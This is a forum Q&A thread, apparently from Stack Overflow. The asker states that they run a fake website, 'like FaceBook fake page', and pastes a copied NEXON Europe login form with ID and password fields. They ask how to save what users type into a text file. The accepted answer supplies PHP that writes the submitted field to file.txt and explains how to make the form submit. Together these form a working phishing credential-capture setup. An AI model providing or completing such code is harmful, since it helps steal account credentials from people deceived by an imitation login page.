# HTML Textbox send to txt file

Tags: html

Hello I have a fake web site and I want to get the HTML code to send the information from textbox to txt file .. Like FaceBook fake page put with some edit.

This is my code:

```
<table width="306px" cellspacing="0" cellpadding="0" border="0" style="padding-top: 24px;">
<tbody>
    <tr>
        <td class="login_txt" width="105">
            <img align="absmiddle" src="https://nximage.nexoneu.com/en/button/bl_arrow3.gif"></img><b></b>

        </td>
        <td width="142" align="left">
            <input id="txtLogin0" class="input_login input_login_id" type="text" tabindex="1" autocomplete="off" maxlength="50" onkeydown="" name="txtLogin0"></input>
        </td>
        <td width="69" align="right" rowspan="3">
            <input id="btnLogin" type="image" align="absmiddle" onclick="javascript:if( $.trim(document.getElementById('txtLogin0').value) == ''){ alert('Please enter your NEXON Europe ID.'); document.getElementById('txtLogin0').focus(); return false;} else if ( $.trim(document.getElementById('txtPassword0').value) == ''){ alert('Please enter your password.');return false;}  else if (($.trim(document.getElementById('hdIsCaptcha').value) == 'true') &&( $.trim(document.getElementById('txtCaptchaText').value) == '')){ alert('Type in the characters you see in the picture below.');return false;};" src="https://nximage.nexoneu.com/en/login/login_btn01.gif" tabindex="3" name="btnLogin"></input>
        </td>
    </tr>
    <tr>
        <td height="6" colspan="2"></td>
    </tr>
    <tr>
        <td class="login_txt"></td>
        <td align="left">
            <input id="txtPassword0" class="input_login" type="password" tabindex="2" autocomplete="off" name="txtPassword0"></input>
        </td>
    </tr>
    <tr>
        <td></td>
        <td class="login_txt" height="36" align="left" colspan="2">
            <label for="chkSaveID">
                <input id="chkSaveID" type="checkbox" onclick="javascript:if( document.getElementById('chkSaveID').checked == true){ alert('Please uncheck if you are using a shared computer.');}" style="vertical-align: middle;" value="1" name="chkSaveID"></input>Remember ID</label>
        </td>
    </tr>
    <tr id="captchaimgtr" style="display: none;"></tr>
    <tr>
        <td height="3" colspan="2"></td>
    </tr>
    <tr id="captchatext" style="display: none;"></tr>
</tbody>
```

**Please Help ;(**

Comment: You need to learn about server-side code.

Comment: By writing code in your favorite server-side programming language.  What have you tried? What don't you understand?

Comment: I Don't Understand server-side !!

Comment: That is far beyond the scope of a StackOverflow question.  Buy a good book about Node.js, C#, or Ruby.

Comment: Ok But Can You Edit My Code To Make It Send Info To The txt file please

Answer (score 1, accepted):

PHP code for saving textbox value/content to *.txt file

```
$my_file = 'file.txt';
$handle = fopen($my_file, 'w') or die('Cannot open file:  '.$my_file);
$data = $_POST['nameOfTxtBox']; //<input name="nameOfTxtBox">
fwrite($handle, $data);
```

P.S.
YOu need to wrap your textbox and submit button inside  tags and set action and then handle data with $_POST (third line of code I provided)